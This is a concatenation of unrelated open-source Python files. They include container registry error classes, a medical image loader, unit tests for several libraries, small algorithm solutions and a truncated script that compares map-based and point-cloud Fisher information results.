"BLOB_UPLOAD_UNKNOWN", "blob upload unknown to registry", detail, 404
)
class DigestInvalid(V2RegistryException):
def __init__(self, detail=None):
super(DigestInvalid, self).__init__(
"DIGEST_INVALID", "provided digest did not match uploaded content", detail
)
class ManifestBlobUnknown(V2RegistryException):
def __init__(self, detail=None):
super(ManifestBlobUnknown, self).__init__(
"MANIFEST_BLOB_UNKNOWN", "manifest blob unknown to registry", detail
)
class ManifestInvalid(V2RegistryException):
def __init__(self, detail=None, http_status_code=400):
super(ManifestInvalid, self).__init__(
"MANIFEST_INVALID", "manifest invalid", detail, http_status_code
)
class ManifestUnknown(V2RegistryException):
def __init__(self, detail=None):
super(ManifestUnknown, self).__init__("MANIFEST_UNKNOWN", "manifest unknown", detail, 404)
class TagExpired(V2RegistryException):
def __init__(self, message=None, detail=None):
super(TagExpired, self).__init__("TAG_EXPIRED", message or "Tag has expired", detail, 404)
class ManifestUnverified(V2RegistryException):
def __init__(self, detail=None):
super(ManifestUnverified, self).__init__(
"MANIFEST_UNVERIFIED", "manifest failed signature verification", detail
)
class NameInvalid(V2RegistryException):
def __init__(self, detail=None, message=None):
super(NameInvalid, self).__init__(
"NAME_INVALID", message or "invalid repository name", detail
)
class NameUnknown(V2RegistryException):
def __init__(self, detail=None):
super(NameUnknown, self).__init__(
"NAME_UNKNOWN", "repository name not known to registry", detail, 404
)
class SizeInvalid(V2RegistryException):
def __init__(self, detail=None):
super(SizeInvalid, self).__init__(
"SIZE_INVALID", "provided length did not match content length", detail
)
class TagAlreadyExists(V2RegistryException):
def __init__(self, detail=None):
super(TagAlreadyExists, self).__init__(
"TAG_ALREADY_EXISTS", "tag was already pushed", detail, 409
)
class TagInvalid(V2RegistryException):
def __init__(self, detail=None):
super(TagInvalid, self).__init__("TAG_INVALID", "manifest tag did not match URI", detail)
class LayerTooLarge(V2RegistryException):
def __init__(self, uploaded=None, max_allowed=None):
detail = {}
message = "Uploaded blob is larger than allowed by this registry"
if uploaded is not None and max_allowed is not None:
detail = {
"reason": "%s is greater than maximum allowed size %s" % (uploaded, max_allowed),
"max_allowed": max_allowed,
"uploaded": uploaded,
}
up_str = bitmath.Byte(uploaded).best_prefix().format("{value:.2f} {unit}")
max_str = bitmath.Byte(max_allowed).best_prefix().format("{value:.2f} {unit}")
message = "Uploaded blob of %s is larger than %s allowed by this registry" % (
                up_str,
                max_str,
            )
        # The error code string below is an assumption: it mirrors the other
        # blob-upload errors defined in this module.
        super(LayerTooLarge, self).__init__("BLOB_UPLOAD_INVALID", message, detail, 400)
class Unauthorized(V2RegistryException):
def __init__(self, detail=None, repository=None, scopes=None):
super(Unauthorized, self).__init__(
"UNAUTHORIZED",
"access to the requested resource is not authorized",
detail,
401,
repository=repository,
scopes=scopes,
)
class Unsupported(V2RegistryException):
def __init__(self, detail=None, message=None):
super(Unsupported, self).__init__(
"UNSUPPORTED", message or "The operation is unsupported.", detail, 405
)
class InvalidLogin(V2RegistryException):
def __init__(self, message=None):
super(InvalidLogin, self).__init__(
"UNAUTHORIZED", message or "Specified credentials are invalid", {}, 401
)
class InvalidRequest(V2RegistryException):
def __init__(self, message=None):
super(InvalidRequest, self).__init__(
"INVALID_REQUEST", message or "Invalid request", {}, 400
)
class NamespaceDisabled(V2RegistryException):
def __init__(self, message=None):
message = message or "This namespace is disabled. Please contact your system administrator."
super(NamespaceDisabled, self).__init__("DENIED", message, {}, 405)
class BlobDownloadGeoBlocked(V2RegistryException):
def __init__(self, detail=None):
message = (
"The region from which you are pulling has been geo-ip blocked. "
+ "Please contact the namespace owner."
)
super(BlobDownloadGeoBlocked, self).__init__("DENIED", message, detail, 403)
class ReadOnlyMode(V2RegistryException):
def __init__(self, detail=None):
message = (
"System is currently read-only. Pulls will succeed but all write operations "
+ "are currently suspended."
)
super(ReadOnlyMode, self).__init__("DENIED", message, detail, 405, is_read_only=True)
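# Illustrative sketch (not part of the original module): shows how a handler can
# turn one of these exceptions into the registry v2 JSON error body via as_dict().
if __name__ == "__main__":
    try:
        raise ManifestUnknown(detail={"tag": "latest"})
    except V2RegistryException as v2e:
        print(v2e.http_status_code, {"errors": [v2e.as_dict()]})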
|
DeepBrainSeg/readers/nib.py | JasperHG90/DeepBrainSeg | 130 | 16872 | <reponame>JasperHG90/DeepBrainSeg
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# author: <NAME>
# contact: <EMAIL>
# MIT License
# Copyright (c) 2020 <NAME>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import tempfile
from time import time
import datetime
import numpy as np
import nibabel as nib
class nib_loader(object):
"""
"""
def __init__(self):
pass
def load_vol(self, path):
"""
path : patient data path
returns numpy array of patient data
"""
self.patient = nib.load(path)
self.affine = self.patient.affine
return self.patient.get_data()
def write_vol(self, path, volume):
"""
path : path to write the data
vol : modifient volume
return: True or False based on saving of volume
"""
try:
volume = np.uint8(volume)
volume = nib.Nifti1Image(volume, self.affine)
volume.set_data_dtype(np.uint8)
nib.save(volume, path)
return True
        except Exception:
return False
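# Illustrative usage sketch (not part of the original file). The paths below are
# placeholders; point them at a real NIfTI volume before running.
if __name__ == "__main__":
    loader = nib_loader()
    volume = loader.load_vol("/tmp/subject_t1.nii.gz")   # numpy array of voxel data
    ok = loader.write_vol("/tmp/subject_t1_copy.nii.gz", volume)
    print("saved:", ok)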
|
terrascript/resource/ddelnano/mikrotik.py | mjuenema/python-terrascript | 507 | 16884 | <filename>terrascript/resource/ddelnano/mikrotik.py
# terrascript/resource/ddelnano/mikrotik.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:21:43 UTC)
import terrascript
class mikrotik_bgp_instance(terrascript.Resource):
pass
class mikrotik_bgp_peer(terrascript.Resource):
pass
class mikrotik_dhcp_lease(terrascript.Resource):
pass
class mikrotik_dns_record(terrascript.Resource):
pass
class mikrotik_pool(terrascript.Resource):
pass
class mikrotik_scheduler(terrascript.Resource):
pass
class mikrotik_script(terrascript.Resource):
pass
__all__ = [
"mikrotik_bgp_instance",
"mikrotik_bgp_peer",
"mikrotik_dhcp_lease",
"mikrotik_dns_record",
"mikrotik_pool",
"mikrotik_scheduler",
"mikrotik_script",
]
|
Codes/Liam/203_remove_linked_list_elements.py | liuxiaohui1221/algorithm | 256 | 16886 | <filename>Codes/Liam/203_remove_linked_list_elements.py
# Runtime: 68 ms
# Memory usage: 16.6 MB
# Approach: a sentinel node is inserted before the head node
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def removeElements(self, head: ListNode, val: int) -> ListNode:
        # Sentinel node, inserted before the head node
sentinel = ListNode(0)
sentinel.next = head
        # Initialize the two pointers, prev and curr
prev, curr = sentinel, head
while curr:
if curr.val == val:
prev.next = curr.next
else:
prev = curr
            # Move on to the next element
curr = curr.next
return sentinel.next
|
mopidy/audio/utils.py | grdorin/mopidy | 6,700 | 16898 | <filename>mopidy/audio/utils.py
from mopidy import httpclient
from mopidy.internal.gi import Gst
def calculate_duration(num_samples, sample_rate):
"""Determine duration of samples using GStreamer helper for precise
math."""
return Gst.util_uint64_scale(num_samples, Gst.SECOND, sample_rate)
def create_buffer(data, timestamp=None, duration=None):
"""Create a new GStreamer buffer based on provided data.
Mainly intended to keep gst imports out of non-audio modules.
.. versionchanged:: 2.0
``capabilites`` argument was removed.
"""
if not data:
raise ValueError("Cannot create buffer without data")
buffer_ = Gst.Buffer.new_wrapped(data)
if timestamp is not None:
buffer_.pts = timestamp
if duration is not None:
buffer_.duration = duration
return buffer_
def millisecond_to_clocktime(value):
"""Convert a millisecond time to internal GStreamer time."""
return value * Gst.MSECOND
def clocktime_to_millisecond(value):
"""Convert an internal GStreamer time to millisecond time."""
return value // Gst.MSECOND
def supported_uri_schemes(uri_schemes):
"""Determine which URIs we can actually support from provided whitelist.
:param uri_schemes: list/set of URIs to check support for.
:type uri_schemes: list or set or URI schemes as strings.
:rtype: set of URI schemes we can support via this GStreamer install.
"""
supported_schemes = set()
registry = Gst.Registry.get()
for factory in registry.get_feature_list(Gst.ElementFactory):
for uri in factory.get_uri_protocols():
if uri in uri_schemes:
supported_schemes.add(uri)
return supported_schemes
def setup_proxy(element, config):
"""Configure a GStreamer element with proxy settings.
:param element: element to setup proxy in.
:type element: :class:`Gst.GstElement`
:param config: proxy settings to use.
:type config: :class:`dict`
"""
if not hasattr(element.props, "proxy") or not config.get("hostname"):
return
element.set_property("proxy", httpclient.format_proxy(config, auth=False))
element.set_property("proxy-id", config.get("username"))
element.set_property("proxy-pw", config.get("password"))
class Signals:
"""Helper for tracking gobject signal registrations"""
def __init__(self):
self._ids = {}
def connect(self, element, event, func, *args):
"""Connect a function + args to signal event on an element.
Each event may only be handled by one callback in this implementation.
"""
if (element, event) in self._ids:
raise AssertionError
self._ids[(element, event)] = element.connect(event, func, *args)
def disconnect(self, element, event):
"""Disconnect whatever handler we have for an element+event pair.
Does nothing it the handler has already been removed.
"""
signal_id = self._ids.pop((element, event), None)
if signal_id is not None:
element.disconnect(signal_id)
def clear(self):
"""Clear all registered signal handlers."""
for element, event in list(self._ids):
element.disconnect(self._ids.pop((element, event)))
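# Illustrative sketch (not part of the original module): Signals only relies on
# objects exposing connect()/disconnect(), so a GStreamer element is stubbed out
# here purely to show the register/teardown flow.
if __name__ == "__main__":
    class _FakeElement:
        def connect(self, event, func, *args):
            return 42  # pretend GObject signal-handler id
        def disconnect(self, handler_id):
            print("disconnected handler", handler_id)
    signals = Signals()
    element = _FakeElement()
    signals.connect(element, "about-to-finish", lambda *args: None)
    signals.clear()  # disconnects every tracked handler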
|
turbinia/processors/archive_test.py | sa3eed3ed/turbinia | 559 | 16903 | <filename>turbinia/processors/archive_test.py
# -*- coding: utf-8 -*-
# Copyright 2019 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for the Archive processor to compress and decompress folders."""
from __future__ import unicode_literals
import os
import tarfile
import unittest
import tempfile
from random import randint
from shutil import rmtree
from turbinia.processors import archive
from turbinia import TurbiniaException
class ArchiveProcessorTest(unittest.TestCase):
"""Tests for Archive Processor."""
def setUp(self):
# Setup testing directories/variables.
self.test_files = []
self.base_output_dir = tempfile.mkdtemp(prefix='turbinia-test-local')
self.tmp_files_dir = os.path.join(self.base_output_dir, 'files')
self.tmp_archive = os.path.join(self.base_output_dir, 'files.tar.gz')
if not os.path.exists(self.tmp_files_dir):
os.makedirs(self.tmp_files_dir)
# Generate text files containing random numbers.
file_max = 10
counter = 0
while counter <= file_max:
file_name = 'file{0:s}.txt'.format(str(counter))
file_path = os.path.join(self.tmp_files_dir, file_name)
file_open = open(file_path, 'w+')
rand_nums = [randint(0, 1000) for i in range(50)]
for i in rand_nums:
file_open.write('%s\n' % str(i))
file_open.close()
counter += 1
self.test_files.append(file_name)
archive.CompressDirectory(self.tmp_files_dir)
def tearDown(self):
# Remove testing directory for this unit test.
if os.path.exists(self.base_output_dir):
rmtree(self.base_output_dir)
def test_compressed_dir(self):
"""Tests the compression function"""
# Check if compressed directory matches expected output path.
self.assertEqual(
archive.CompressDirectory(self.tmp_files_dir), self.tmp_archive)
# Check to confirm that the archive is gzip format.
self.assertEqual(tarfile.is_tarfile(self.tmp_archive), True)
# Raise assertion if folder does not exist.
with self.assertRaises(TurbiniaException):
archive.CompressDirectory('blah')
def test_validate_tarfile(self):
"""Tests the validate function used to decompress tar files"""
# Raise exception for file that does not exist.
with self.assertRaises(TurbiniaException):
archive.ValidateTarFile('blah.no')
# Raise exception for a file with unsupported extension.
with self.assertRaises(TurbiniaException):
archive.ValidateTarFile(self.tmp_files_dir)
if __name__ == '__main__':
unittest.main()
|
app/pathfinding/finder/__init__.py | TheronHa/Spaghetti | 208 | 16916 | __all__ = ['a_star', 'best_first', 'bi_a_star', 'breadth_first', 'dijkstra',
'finder', 'ida_star']
|
tests/ut/python/nn/test_activation.py | PowerOlive/mindspore | 3,200 | 16919 | <filename>tests/ut/python/nn/test_activation.py
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
""" test Activations """
import numpy as np
import mindspore.nn as nn
from mindspore import Tensor
from mindspore.common.api import _cell_graph_executor
from ..ut_filter import non_graph_engine
class SoftmaxNet(nn.Cell):
def __init__(self, dim):
super(SoftmaxNet, self).__init__()
self.softmax = nn.Softmax(dim)
def construct(self, x):
return self.softmax(x)
@non_graph_engine
def test_compile():
net = SoftmaxNet(0)
input_tensor = Tensor(np.array([[1.2, 2.1], [2.2, 3.2]], dtype=np.float32))
net(input_tensor)
@non_graph_engine
def test_compile_axis():
net = SoftmaxNet(-1)
prob = 355
input_data = np.random.randn(4, 16, 1, 1).astype(np.float32) * prob
input_tensor = Tensor(input_data)
net(input_tensor)
class LogSoftmaxNet(nn.Cell):
def __init__(self, dim):
super(LogSoftmaxNet, self).__init__()
self.logsoftmax = nn.LogSoftmax(dim)
def construct(self, x):
return self.logsoftmax(x)
@non_graph_engine
def test_compile_logsoftmax():
net = LogSoftmaxNet(0)
input_tensor = Tensor(np.array([[1.2, 2.1], [2.2, 3.2]], dtype=np.float32))
net(input_tensor)
class Net1(nn.Cell):
def __init__(self):
super(Net1, self).__init__()
self.relu = nn.ReLU()
def construct(self, x):
return self.relu(x)
def test_compile_relu():
net = Net1()
input_data = Tensor(np.array([[1.2, 2.1], [2.2, 3.2]], dtype=np.float32))
_cell_graph_executor.compile(net, input_data)
class Net_gelu(nn.Cell):
def __init__(self):
super(Net_gelu, self).__init__()
self.gelu = nn.GELU()
def construct(self, x):
return self.gelu(x)
def test_compile_gelu():
net = Net_gelu()
input_data = Tensor(np.array([[1.2, 2.1], [2.2, 3.2]], dtype=np.float32))
_cell_graph_executor.compile(net, input_data)
class NetLeakyReLU(nn.Cell):
def __init__(self, alpha):
super(NetLeakyReLU, self).__init__()
self.leaky_relu = nn.LeakyReLU(alpha)
def construct(self, x):
return self.leaky_relu(x)
def test_compile_leaky_relu():
net = NetLeakyReLU(alpha=0.1)
input_data = Tensor(np.array([[1.6, 0, 0.6], [6, 0, -6]], dtype=np.float32))
_cell_graph_executor.compile(net, input_data)
|
leetcode/345.reverse-vowels-of-a-string.py | geemaple/algorithm | 177 | 16947 | class Solution(object):
def reverseVowels(self, s):
"""
:type s: str
:rtype: str
"""
vowels = set("aeiouAEIOU")
s = list(s)
i = 0
j = len(s) - 1
while i < j:
while i < j and s[i] not in vowels:
i += 1
while i < j and s[j] not in vowels:
j -= 1
if i < j:
s[i], s[j] = s[j], s[i]
i += 1
j -= 1
return ''.join(s) |
nndet/evaluator/detection/__init__.py | joeranbosma/nnDetection | 242 | 16958 | <reponame>joeranbosma/nnDetection<gh_stars>100-1000
from nndet.evaluator.detection.froc import FROCMetric
from nndet.evaluator.detection.coco import COCOMetric
from nndet.evaluator.detection.hist import PredictionHistogram
|
tensorflow_transform/test_case_test.py | LaudateCorpus1/transform | 970 | 16963 | <gh_stars>100-1000
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tensorflow_transform.test_case."""
import re
from tensorflow_transform import test_case
import unittest
class TftUnitTest(test_case.TransformTestCase):
def testCrossNamedParameters(self):
test_cases_1 = [
{'testcase_name': 'a_1_b_1', 'a': 1, 'b': 1},
{'testcase_name': 'a_3_b_3', 'a': 3, 'b': 3},
]
test_cases_2 = [
{'testcase_name': 'c_2', 'c': 2},
{'testcase_name': 'c_4', 'c': 4},
]
expected_cross = [
{'testcase_name': 'a_1_b_1_c_2', 'a': 1, 'b': 1, 'c': 2},
{'testcase_name': 'a_1_b_1_c_4', 'a': 1, 'b': 1, 'c': 4},
{'testcase_name': 'a_3_b_3_c_2', 'a': 3, 'b': 3, 'c': 2},
{'testcase_name': 'a_3_b_3_c_4', 'a': 3, 'b': 3, 'c': 4},
]
self.assertEqual(
test_case.cross_named_parameters(test_cases_1, test_cases_2),
expected_cross)
def testCrossParameters(self):
test_cases_1 = [('a', 1), ('b', 2)]
test_cases_2 = [(True,), (False,)]
expected_cross = [
('a', 1, True), ('b', 2, True),
('a', 1, False), ('b', 2, False),
]
self.assertCountEqual(
test_case.cross_parameters(test_cases_1, test_cases_2), expected_cross)
def testAssertDataCloseOrEqual(self):
self.assertDataCloseOrEqual([{'a': 'first',
'b': 1.0,
'c': 5,
'd': ('second', 2.0)},
{'e': 2,
'f': 3}],
[{'a': 'first',
'b': 1.0000001,
'c': 5,
'd': ('second', 2.0000001)},
{'e': 2,
'f': 3}])
with self.assertRaisesRegexp(AssertionError, r'len\(.*\) != len\(\[\]\)'):
self.assertDataCloseOrEqual([{'a': 1}], [])
with self.assertRaisesRegexp(
AssertionError,
re.compile('Element counts were not equal.*: Row 0', re.DOTALL)):
self.assertDataCloseOrEqual([{'a': 1}], [{'b': 1}])
with self.assertRaisesRegexp(
AssertionError,
re.compile('Not equal to tolerance.*: Row 0, key a', re.DOTALL)):
self.assertDataCloseOrEqual([{'a': 1}], [{'a': 2}])
@test_case.parameters((1, 'a'), (2, 'b'))
def testSampleParametrizedTestMethod(self, my_arg, my_other_arg):
self.assertIn((my_arg, my_other_arg), {(1, 'a'), (2, 'b')})
if __name__ == '__main__':
unittest.main()
|
test/hummingbot/core/utils/test_fixed_rate_source.py | BGTCapital/hummingbot | 3,027 | 16966 | <filename>test/hummingbot/core/utils/test_fixed_rate_source.py
from decimal import Decimal
from unittest import TestCase
from hummingbot.core.utils.fixed_rate_source import FixedRateSource
class FixedRateSourceTests(TestCase):
def test_look_for_unconfigured_pair_rate(self):
rate_source = FixedRateSource()
self.assertIsNone(rate_source.rate("BTC-USDT"))
def test_get_rate(self):
rate_source = FixedRateSource()
rate_source.add_rate("BTC-USDT", Decimal(40000))
self.assertEqual(rate_source.rate("BTC-USDT"), Decimal(40000))
def test_get_rate_when_inverted_pair_is_configured(self):
rate_source = FixedRateSource()
rate_source.add_rate("BTC-USDT", Decimal(40000))
self.assertEqual(rate_source.rate("USDT-BTC"), Decimal(1) / Decimal(40000))
def test_string_representation(self):
self.assertEqual(str(FixedRateSource()), "fixed rates")
|
act_map/scripts/exp_compare_diff_maps.py | debugCVML/rpg_information_field | 149 | 17019 | <gh_stars>100-1000
#!/usr/bin/env python
import os
import argparse
import yaml
import numpy as np
from colorama import init, Fore, Style
from matplotlib import rc
import matplotlib.pyplot as plt
import plot_utils as pu
init(autoreset=True)
rc('font', **{'serif': ['Cardo'], 'size': 20})
rc('text', usetex=True)
kMetrics = ['det', 'mineig', 'trace']
kMetricsLabels = ['$\det$', '$\lambda_{min}$', '${Tr}$']
kSecToUs = 1.0e6
kPallete = [
'blue', 'green', 'red', 'gold', 'purple', 'gray', 'cyan',
'midnightblue', 'lime', 'lightcoral', 'darkgoldenrod', 'violet', 'dimgray', 'darkorange',
'black'
]
def normalize(data, min_val=0.0, max_val=1.0):
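    """Linearly rescale ``data`` into [min_val, max_val], keeping ``None`` entries.
    Example: normalize([2.0, 4.0, None, 6.0]) returns [0.0, 0.5, None, 1.0].
    """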
data_valid = [v for v in data if v is not None]
dmax = np.max(data_valid)
dmin = np.min(data_valid)
ddata = dmax - dmin
ddes = max_val - min_val
return [(v - dmin) / ddata * ddes + min_val if v is not None else v for v in data]
def logAndNormalize(data, min_val=0.0, max_val=1.0):
data_log = [np.log(v) if v > 0 else None for v in data]
return normalize(data_log)
def readResults(res_dir, nm):
file_nms = sorted([v for v in os.listdir(res_dir) if v.endswith('.txt') and nm in v])
print("- Found files for map {}:\n - {}".format(nm, '\n - '.join(file_nms)))
print("- read general info")
gen_nm = "general_info_{}.txt".format(nm)
general_info = {}
if gen_nm in file_nms:
data = np.loadtxt(os.path.join(res_dir, gen_nm))
assert data.shape == (4,)
general_info['n_vox'] = data[0]
general_info['t_construct'] = data[1]
general_info['ker_mem_kb'] = data[2]
general_info['pc_mem_kb'] = data[3]
print("- read fim")
fim_vox_c_nm = 'fim_vox_c_{}.txt'.format(nm)
fim = {}
if fim_vox_c_nm in file_nms:
fim_vox_c_fn = os.path.join(res_dir, fim_vox_c_nm)
fim_map_fn = os.path.join(res_dir, "fim_map_{}.txt".format(nm))
fim_pc_fn = os.path.join(res_dir, "fim_pc_{}.txt".format(nm))
fim_vox_centers = np.loadtxt(fim_vox_c_fn)
assert fim_vox_centers.shape[1] == 3
n_fim = fim_vox_centers.shape[0]
print(Style.DIM + "Found {} FIM".format(n_fim))
fim_map = np.loadtxt(fim_map_fn)
assert fim_map.shape[1] == 36
assert n_fim == fim_map.shape[0]
fim_pc = np.loadtxt(fim_pc_fn)
assert fim_pc.shape[1] == 36
assert n_fim == fim_pc.shape[0]
fim['vox_c'] = fim_vox_centers
fim['map'] = [v.reshape((6, 6)) for v in fim_map]
fim['pc'] = [v.reshape((6, 6)) for v in fim_pc]
fim_time_map_fn = os.path.join(res_dir, "fim_time_map_{}.txt".format(nm))
fim_time_map = np.loadtxt(fim_time_map_fn)
fim_time_pc_fn = os.path.join(res_dir, "fim_time_pc_{}.txt".format(nm))
fim_time_pc = np.loadtxt(fim_time_pc_fn)
fim['map_time'] = fim_time_map
fim['map_time_mean'] = np.mean(fim_time_map)
fim['pc_time'] = fim_time_pc
fim['pc_time_mean'] = np.mean(fim_time_pc)
print(Style.DIM + "Aver. Map: {}. Aver. PC: {}".format(
fim['map_time_mean'], fim['pc_time_mean']))
else:
print(Fore.RED + "Nothing found.")
print("- read query time")
t_query = {}
for m in kMetrics:
t_map_fn = os.path.join(res_dir, 't_query_map_{}_{}.txt'.format(m, nm))
if not os.path.exists(t_map_fn):
print(Fore.RED + "* metric {} does not exist for query time".format(m))
continue
t_pc_fn = os.path.join(res_dir, 't_query_pc_{}_{}.txt'.format(m, nm))
assert os.path.exists(t_pc_fn)
t_map = np.loadtxt(t_map_fn)
t_map_mean = np.mean(t_map)
t_pc = np.loadtxt(t_pc_fn)
t_pc_mean = np.mean(t_pc)
assert t_map.size == t_pc.size
print(Style.DIM + "* metric {}: {} samples, map aver. {}, pc aver. {}".format(
m, t_map.size, t_map_mean, t_pc_mean))
t_query[m] = {}
t_query[m]['map'] = t_map.ravel().tolist()
t_query[m]['map_mean'] = t_map_mean
t_query[m]['pc'] = t_pc.ravel().tolist()
t_query[m]['pc_mean'] = t_pc_mean
print("- read optimal orientations")
optim_orient = {}
oo_vox_c_fn = os.path.join(res_dir, 'optim_orient_vox_c_{}.txt'.format(nm))
assert os.path.exists(oo_vox_c_fn), oo_vox_c_fn
oo_vox_c = np.loadtxt(oo_vox_c_fn)
assert oo_vox_c.shape[1] == 3
n_oo = oo_vox_c.shape[0]
optim_orient['vox_c'] = oo_vox_c
print(Style.DIM + "Total {} samples".format(n_oo))
for m in kMetrics:
oo_map_fn = os.path.join(res_dir, 'optim_orient_map_{}_{}.txt'.format(m, nm))
if not os.path.exists(oo_map_fn):
print(Fore.RED + "* metric {} does not exist for optimal orientations".format(m))
continue
else:
print(Style.DIM + "* metric {}".format(m))
oo_pc_fn = os.path.join(res_dir, 'optim_orient_pc_{}_{}.txt'.format(m, nm))
assert os.path.exists(oo_pc_fn)
optim_orient[m] = {}
oo_map = np.loadtxt(oo_map_fn)
assert oo_map.shape == (n_oo, 3)
oo_pc = np.loadtxt(oo_pc_fn)
assert oo_pc.shape == (n_oo, 3)
optim_orient[m]['map'] = oo_map
optim_orient[m]['pc'] = oo_pc
print("- read metrics for continous motion")
cont_metrics = {}
cont_rot_fn = os.path.join(res_dir, 'metric_cont_rot_{}.txt'.format(nm))
if os.path.exists(cont_rot_fn):
cont_trans_fn = os.path.join(res_dir, 'metric_cont_trans_{}.txt'.format(nm))
assert os.path.exists(cont_trans_fn)
cont_metrics['rot'] = {}
cont_rot = np.loadtxt(cont_rot_fn)
assert cont_rot.shape[0] == 2
print(Style.DIM + "{} rotations.".format(cont_rot.shape[1]))
cont_metrics['rot']['map'] = cont_rot[0].ravel().tolist()
cont_metrics['rot']['pc'] = cont_rot[1].ravel().tolist()
cont_metrics['trans'] = {}
cont_trans = np.loadtxt(cont_trans_fn)
assert cont_trans.shape[0] == 2
print(Style.DIM + "{} translations.".format(cont_trans.shape[1]))
cont_metrics['trans']['map'] = cont_trans[0].ravel().tolist()
cont_metrics['trans']['pc'] = cont_trans[1].ravel().tolist()
else:
print(Fore.RED + "Nothing found.")
return {"general_info": general_info, 'fim': fim, 't_query': t_query,
'optim_orient': optim_orient, 'cont_metrics': cont_metrics}
def _writeComplexityTable(nm_to_res, pc_res_key, selected_nms, nm_to_label, complexity_table_fn):
sel_labels = [nm_to_label[v] for v in selected_nms]
with open(complexity_table_fn, 'w') as f:
f.write('# PC {}\n'.format(' '.join(sel_labels)))
# construction time
f.write('t_construct (sec) ')
f.write('- ')
for nm in selected_nms:
f.write('{} '.format(nm_to_res[nm]['general_info']['t_construct']))
f.write('\n')
# memory
f.write('memory (MB) ')
f.write('{:.2f} '.format(nm_to_res[pc_res_key]['general_info']['pc_mem_kb'] / 1024.0))
for nm in selected_nms:
f.write('{:.2f} '.format(nm_to_res[nm]['general_info']['ker_mem_kb'] / 1024.0))
f.write('\n')
# query
# fim
f.write('# query (us)\n')
f.write('fim ')
f.write('{:.1f} '.format(nm_to_res[pc_res_key]['fim']['pc_time_mean'] * kSecToUs))
for nm in selected_nms:
fim_res = nm_to_res[nm]['fim']
if 'map_time' not in fim_res:
f.write('- ')
else:
f.write('{:.1f} '.format(fim_res['map_time_mean'] * kSecToUs))
f.write('\n')
# metrics
for m in kMetrics:
f.write('{} '.format(m))
f.write('{:.1f} '.format(nm_to_res[pc_res_key]['t_query'][m]['pc_mean'] * kSecToUs))
for nm in selected_nms:
t_query = nm_to_res[nm]['t_query']
if m not in t_query:
f.write('- ')
else:
f.write('{:.1f} '.format(t_query[m]['map_mean'] * kSecToUs))
f.write('\n')
def _computeAndWriteFIMDiff(nm_to_res, selected_nms, nm_to_label, top_save_dir=None):
fim_fro_diff = {}
sel_labels = [nm_to_label[v] for v in selected_nms]
for nm in selected_nms:
print('- calculating {}'.format(nm))
fim_pc = nm_to_res[nm]['fim']['pc']
fim_map = nm_to_res[nm]['fim']['map']
fim_diff_perc = []
for fim_pc_i, fim_map_i in zip(fim_pc, fim_map):
fro_pc_i = np.linalg.norm(fim_pc_i)
fro_dfim_i = np.linalg.norm(fim_map_i - fim_pc_i)
fim_diff_perc.append(fro_dfim_i / fro_pc_i * 100)
if top_save_dir:
with open(os.path.join(top_save_dir, 'fim_fro_diff_perc_{}.txt'.format(nm)), 'w') as f:
f.write('# each item is one percentage of FIM difference w.r.t. point cloud\n')
f.write('{}'.format(' '.join(['{:.2f}'.format(v) for v in fim_diff_perc])))
fim_fro_diff[nm] = fim_diff_perc
print(Style.DIM + "* {}: {} ({})".format(nm, np.median(fim_diff_perc), np.std(fim_diff_perc)))
if top_save_dir:
print('- writing table')
with open(os.path.join(top_save_dir, 'fim_fro_diff_table.txt'), 'w') as f:
f.write('# Median (std): {}\n'.format(' '.join(sel_labels)))
for nm in selected_nms:
diff_perc = fim_fro_diff[nm]
f.write("{} ({}) ".format(np.median(diff_perc), np.std(diff_perc)))
return fim_fro_diff
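# A minimal sketch of the relative FIM error computed in _computeAndWriteFIMDiff above:
# the Frobenius norm of (FIM_map - FIM_pc) expressed as a percentage of the Frobenius
# norm of the point-cloud FIM. This helper is illustrative only and is never called.
def _example_fim_rel_diff_percent(fim_map_i, fim_pc_i):
    fim_map_i = np.asarray(fim_map_i, dtype=float)
    fim_pc_i = np.asarray(fim_pc_i, dtype=float)
    return np.linalg.norm(fim_map_i - fim_pc_i) / np.linalg.norm(fim_pc_i) * 100.0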
def _boxplotFIMDiffs(nm_to_fim_diff_perc, names, nm_to_label, top_save_dir):
xlabels = [nm_to_label[v] for v in names]
data_labels = ['FIM Diff']
colors = [kPallete[0]]
data = []
for nm in names:
